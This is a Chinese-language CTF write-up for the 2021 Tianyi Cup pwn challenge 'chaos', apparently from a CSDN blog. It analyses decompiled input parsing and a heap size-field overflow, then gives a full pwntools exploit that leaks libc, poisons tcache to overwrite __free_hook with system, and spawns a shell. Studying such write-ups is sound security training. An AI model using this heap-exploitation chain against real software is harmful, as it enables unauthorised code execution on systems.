2021 天翼杯 pwn chaos

最新推荐文章于 2023-05-27 13:05:38 发布
最新推荐文章于 2023-05-27 13:05:38 发布
阅读量432 收藏 2
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120446821
版权
该博客详细分析了一个程序的输入验证过程,指出存在一处缓冲区溢出漏洞。作者展示了如何通过该漏洞泄露libc地址,并进一步利用tcache实现free_hook攻击。exp部分提供了利用此漏洞的完整exploit代码,包括添加、删除、编辑和显示操作,最终实现远程shell的获取。
摘要由CSDN通过智能技术生成

在这里插入图片描述
首先是一个输入,输入完之后逻辑比较长,我们一点一点分析。

首先是一个大的while循环。

while ( !*a1 || *a1 != 10 && (*a1 != 13 || a1[1] != 10) )
  {
    if ( v8 <= 5 )
      *((_QWORD *)&unk_202060 + 2 * v8) = a1;
    sb = strchr(a1, 58);
    if ( !sb )
    {
      puts("error.");
      exit(1);
    }
    *sb = 0;
    for ( sc = sb + 1; *sc && (*sc == 32 || *sc == 13 || *sc == 10 || *sc == 9); ++sc )
      *sc = 0;
    if ( !*sc )
    {
      puts("abort.");
      exit(2);
    }
    if ( v8 <= 5 )
      qword_202068[2 * v8] = sc;
    sd = strchr(sc, 10);
    if ( !sd )
    {
      puts("error.");
      exit(3);
    }
    *sd = 0;
    a1 = sd + 1;
    if ( *a1 == 13 )
      *a1++ = 0;
    s1 = (char *)*((_QWORD *)&unk_202060 + 2 * v8);
    nptr = (char *)qword_202068[2 * v8];
    if ( !strcasecmp(s1, "opcode") )
    {
      if ( v7 )
      {
        puts("error.");
        exit(5);
      }
      v7 = atoi(nptr);
    }
    else
    {
      if ( strcasecmp(s1, "passwd") )
      {
        puts("error.");
        exit(4);
      }
      if ( strlen(nptr) <= 1 )
      {
        puts("error.");
        exit(5);
      }
      v9 = strlen(nptr) - 1;
      if ( dest )
      {
        puts("error.");
        exit(5);
      }
      dest = calloc(v9 + 8, 1uLL);
      if ( v9 <= 0 )
      {
        puts("error.");
        exit(5);
      }
      memcpy(dest, nptr, v9);
    }
    ++v8;
  }

说白了就是对我们的输入进行要求,要求
opcode:1就是功能1,然后功能里面有密码,需要用passwd来
用功能1举例,完整的一个create输入是

“opcode:1\npasswd:Cr4at3a\n”

那我们再来看功能

create
在这里插入图片描述需要一个大小,最大0x208,创建的chunk是0x210,最后两个QWORD分别是大小跟一个指针。

这个指针会把我们所有的chunk串起来,构成一个单链表的状态,链表头放在bss

有漏洞,在哪?
在我们写的时候居然可以把size覆盖掉,第一次覆盖掉,第二次就可以溢出。

edit
在这里插入图片描述

show
在这里插入图片描述

delete
在这里插入图片描述
剩下三个函数就平平无奇。

我们就利用那个溢出,首先泄露libc,之后直接攻击tcache打free_hook就好啦。

exp

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"
context.terminal = ["tmux", "splitw", "-h"]

local = 1
if local:
    r = process('./chaos')
else:
    r = remote("192.168.40.178",8999)
    
libc=ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6')

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+" : "+hex(addr))

def debug():
    gdb.attach(r)
    pause()

def add(size, content):
    sla(">>> ", "opcode:1\npasswd:Cr4at3a\n")
    sla(">>> ", str(size))
    sla(">>> ", content)
    
def show(index):
    sla(">>> ", "opcode:2\npasswd:SH0wa\n")
    sla(">>> ", str(index))

def edit(index, content):
    sla(">>> ", "opcode:3\npasswd:Ed1ta\n")
    sla(">>> ", str(index))
    sa(">>> ", content)

def delete(index):
    sla(">>> ", "opcode:4\npasswd:D3l4tea\n")
    sla(">>> ", str(index))


for i in range(12):
    add(0x208, "a") #0~11

for i in range(8):
    delete(0)

delete(1)
edit(1, '\x01' * 0x200 + p64(0x300))
edit(1, '\x01' * 0x240)

show(1)
libc_base = u64(ru('\x7f')[-6:] + '\x00\x00') - 0x3ebeb0
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym["system"]
one_gadget = libc_base + 0x4f3c2
lg("libc_base", libc_base)

edit(1, '\x01' * 0x200 + p64(0xa00) + p64(0) + p64(0) + p64(0x21) + p64(0) * 3 + p64(0x221))

add(0x200, "a")
delete(1)

payload = '\x01' * 0x470 + p64(0) + p64(0x221) + p64(free_hook)
edit(1, payload)

debug()

add(0x200, "/bin/sh\x00")
add(0x200, p64(system_addr))

delete(1)

r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
从零开始入门pwn(一):pwn的介绍以及部分前置知识
m0_51466347的博客
12-06 4万+
目录 一.前言 二.pwn的介绍 pwn的定义 pwn的题目模式 前置知识 一.Linux 二.C语言 三.汇编语言 四.计算机组成原理 三.总结 一.前言 本人凭着一腔热血想要入门pwn,但却被pwn的高入门门槛泼了一次又一次冷水,趁着自己还记得,写一点心得为后来想入门的跟我一样的零基础新手提供一些帮助。 二.pwn的介绍 pwn的定义 想必很多想要入门的新手都已经通过各种各样的入门文章或视频了解了pwn的定义以及方向,但出于礼貌,我在这里还是再重复一下下。...
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
2021第二届“天翼网络安全攻防大赛writeup
渗透测试研究中心
12-24 1397
Web1.esay_eval<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; ...
PWN-入门基础
工作学习笔记
05-27 3833
简单介绍四个方面的内容:一是什么是PWN、二是做PWN所需知识储备、三是基于Ubuntu搭建PWN环境、四是在公网上练习PWN题。
Pwn的常见保护介绍
educat0r的博客
02-16 1295
一:canary Canary是金丝雀的意思。技术上表示最先的测试的意思。这个来自以前挖煤的时候,矿工都会先把金丝雀放进矿洞,或者挖煤的时候一直带着金丝雀。金丝雀对甲烷和一氧化碳浓度比较敏感,会先报警。所以大家都用canary来搞最先的测试。stack canary表示栈的报警保护。 在函数返回值之前添加的一串随机数(不超过机器字长),末位为/x00(提供了覆盖最后一字节输出泄露canary的可...
PWN概论
m0_52249553的博客
05-06 6917
什么是pwn pwn是ctf解题赛中的一个题目类别,它在黑客俚语中代表着攻破,获取权限,由“own”这个词引申而来。在CTF比赛中它代表着溢出类的题目,常见的类型有整数溢出、栈溢出、堆溢出等。主要考查参赛选手对漏洞的利用能力。 学习pwn的知识储备 反汇编工具 在比赛中我们会拿到一个二进制文件(由c文件编译而来),我们要找出这个可执行文件的漏洞,但二进制文件是由0和1的机器码组成,正常人是直接无法看懂里面的内容的,这时我们需要利用反编译工具将这个二进制文件反编译为我们能看懂的语言(汇编语言或者c语言
2021莲城比赛题包.zip
10-12
2021莲城比赛题包.zip】是一个压缩包文件,包含了参与2021年莲城网络安全竞赛的相关题目和资料。这个比赛很可能是一个网络安全技术挑战赛,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞赛...
安恒pwn1
04-25
"安恒pwn1" 本文主要讨论的是安恒pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
赣网2021_pwn2.rar
12-11
赣网2021 pwn1 bin ctf
强网2022 pwn 赛题解析.docx
12-18
【强网2022 Pwn赛题解析】 在网络安全竞赛“强网”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
PWN_初步认识
CheAyuki13的博客
08-17 4422
pwn简介:CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。 接下来介绍相关的学习思路(自己总结的,当作参考)0x01 基础知识准备 pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备c语言汇编语言python操作系统linux操作 C...
2021 第二届天翼ctf
qq_45603443的博客
09-25 3161
2021 天翼ctf wpMisc签到BrowserPwnezshellWebeztpjacksoneasy_evalTip Misc 签到 群公告 FLAG flag{e7gRR32wJJcHwQjwc2k9qFZ6fvn3gZ8P} Browser 先是拿到 1.默认浏览器(请给出在注册表中可证明它是默认浏览器的对应的值,如:IE.HTTP) 一般都在注册表,耐心翻翻 ./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist
2021 天翼 pwn ezshell
yongbaoii的博客
09-24 1037
逻辑简单,开了一个可以rwx的页,我们输入一段shellcode,绕过一些检查,开了沙箱,最后执行它。 一点一点来,首先我们输入shellcode之后函数__ctype_b_loc函数是干嘛的? 我们去读源码,在ctype/ctype.h #ifndef _ISbit /* These are all the characteristics of characters. If there get to be more than 16 distinct characteristics, many.
pwn学习-攻防世界新手区
qq_45653588的博客
12-20 1387
文章目录0X00 hello_pwn0X01 when_did_you_born0X02 level00X03 level20x04 CGfsb0x05 guess_num0x06 cgpwn20x07 int_overflow0x08 level30x09 string 0X00 hello_pwn 下载文件,拖入Ubuntu用checksec查看,64位文件,开启了NX保护。 拖入ida查看,read函数读取输入赋值给unk_601068,然后判断dword_60106C是否等于nuaa,相等则执行s
天翼2020_wp_by_LQers
蚁景网安学院
08-05 1551
misc签到curl -H "Range: bytes=6291450000-" --output /dev/stdouthttp://das.wetolink.com...
2021 天翼easy_eval
m0_56059226的博客
10-04 2352
打开环境 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a-&gt
CTF中pwn的入门指南
热门推荐
菜的只能随便写写博客
09-13 3万+
CTF中pwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言...
2021 天翼 overheap
yongbaoii的博客
01-20 523
保护显然 add大小不能超过0x1000 show 正常 edit 它的输入函数 有个off by null。 free free函数也正常。 所以说完了就是2.34版本下的一道off by null。 高版本要注意什么 首先是2.32开始对tcache和fastbin的fd指针进行了异或加密,异或的内容其实就是堆地址,所以我们首先必须泄露heap地址。 tcache_entry->next中存放的chunk地址为与自身地址进行异或运算后所得到的值。 2.34开始取消了malloc_hook.
『CTF Web复现』[2021 天翼]easy_eval
Ho1aAs‘s Blog
09-23 1136
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值